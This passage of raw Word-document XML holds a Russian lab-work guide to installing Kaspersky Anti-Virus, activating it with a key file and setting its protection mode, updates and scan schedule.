        <w:t>, следовательно внизу показано описание самой пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">граммы.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Оставьте установку всех компонентов и продолжите инсталляцию, нажав </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее</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3558540" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76" name="Рисунок 76" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-19.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId181" r:link="rId182">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Далее </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мастер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> проверяет наличие на компьютере других антив</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">русных программ, полный список которых можно найти в файле </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>release_notes.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в разделе "</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Установка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>". Если такие найдутся, то пользователю будет выведено соответствующее уведомление с предложением их удалить. Но в нашем случае компьютер чист и этот этап в интерфейсе никак не отображае</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ся </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">На следующем этапе нужно подтвердить намерение установить программу, нажав </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Установить</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. После этого начнется непосредственное коп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рование файлов и регистрация программы в реестре, и вернуться к предыд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">щим окнам </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мастера</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> установки будет невозможно.</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Расположенный в центре окна флаг </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Включить защиту модулей до начала установки</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> рекомендуется оставить включенным. Но в дальнейшем, при повторной инсталляции этой же версии </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> его сл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">дует очищать. Он отвечает за сохранность сделанных во время установки настроек, они могут потребоваться в дальнейшем для восстановления </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Ка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>перского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в случае повреждения его программных модулей</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7" name="Рисунок 77" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-20.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId183" r:link="rId184">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Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Установить</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и проследите за действиями </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Маст</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Они описываются непосредственно над индикатором процесса установки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3558540" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="78" name="Рисунок 78" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-21.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId185" r:link="rId186">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По окончании инсталляции </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мастер установки</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> выводит информ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ционное окно. Вам необходимо ознакомится с расположенным в нем текстом и запустить </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мастер настройки</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> приложения. Для этого нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее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9" name="Рисунок 79" descr="http://www.intuit.ru/department/security/antiviruskasp/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intuit.ru/department/security/antiviruskasp/11/2-22.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId187" r:link="rId188">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На первом этапе настройки нужно активировать приложение. Это можно сделать одним из четырех предложенных вариантов: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Используя код активации, коммерческий или пробный. Такой код может быть выдан при покупке через Интернет, в этом случае активация пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исходит также через Интернет;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Активировать, используя полученный ранее ключевой файл (име</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>но этот способ будет использован в этой лабораторной работе);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Активировать позже - если ключевого файла нет, то можно устан</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вить антивирус в пробном режиме (программа будет работать 30 дней и будет не доступно обновление антивирусных баз , следовательно, надежную защиту получить не получится).</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Выберите вариант </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Использовать полученный ранее лицензионный ключ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее</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3611880" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="80" name="Рисунок 80" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-23.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId189" r:link="rId190">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3611880" cy="28194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В следующем окне нужно указать путь к лицензионному файлу. Для этого нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обзор</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611880" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81" name="Рисунок 81" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-24.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId191" r:link="rId192">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3611880" cy="28194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Перейдите к указанной преподавателем папке с ключевым файлом, выделите его и нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Открыть</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015740" cy="2941320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="82" name="Рисунок 82" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-25.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId193" r:link="rId194">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4015740" cy="29413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После открытия выбранного файла, в окне </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мастера</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> появится и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">формация о нем. Ознакомьтесь с ней и нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее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611880" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="83" name="Рисунок 83" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-26.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId195" r:link="rId196">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3611880" cy="28194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На этапе перехода к следующему окну проводится проверка откр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>того лицензионного ключа. Если он действителен, то происходит его актив</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ция. Для продолжения настройки нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее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3665220" cy="2880360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="84" name="Рисунок 84" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-27.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId197" r:link="rId198">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3665220" cy="288036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После активации начинается этап первоначальной настройки ант</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">вируса. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мастер установки</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> предлагает настроить только основные параметры работы приложения и все сделанные в ходе инсталляции настройки впосле</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ствии можно будет легко изменить с помощью графического интерфейса.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Первое окно предлагает выбрать режим интерактивной защиты. Проч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тайте описание различий между этими двумя режимами, оставьте выбранную по умолчанию </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Базовую защиту</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3870960" cy="3025140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85" name="Рисунок 85" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-28.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId199" r:link="rId200">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3870960" cy="302514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Далее предлагается определить режим обновления, по умолчанию выбран пункт </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Автоматически</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Он подходит для большинства пользователей. Однако нужно знать, что в общем случае настроить и обновить антивирусные баз можно уже прямо в ходе установки (для этого предназначены кнопки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обновить сейчас</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и меню выбора режима обновления)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3611880" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86" name="Рисунок 86" descr="http://www.intuit.ru/department/security/antiviruskasp/1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intuit.ru/department/security/antiviruskasp/11/2-29.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId201" r:link="rId202">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3611880" cy="28194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В следующем окне можно задать настройки и расписание запуска проверки на наличие вирусов объектов автозапуска, критических областей и полной проверки компьютера.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Для большинства пользователей рекомендуется настроить проверку об</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ъ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ектов автозапуска (как наиболее часто поражаемой области компьютера) при каждой перезагрузке </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это обычно соответствует каждой перезагрузке компьютера.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Под проверкой критических областей подразумевается поиск вирусов в важных системных областях. По умолчанию это системная память, объекты а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тозапуска, загрузочные секторы дисков и папки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C:\Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:szCs w:val="28"/>
        </w:rPr>
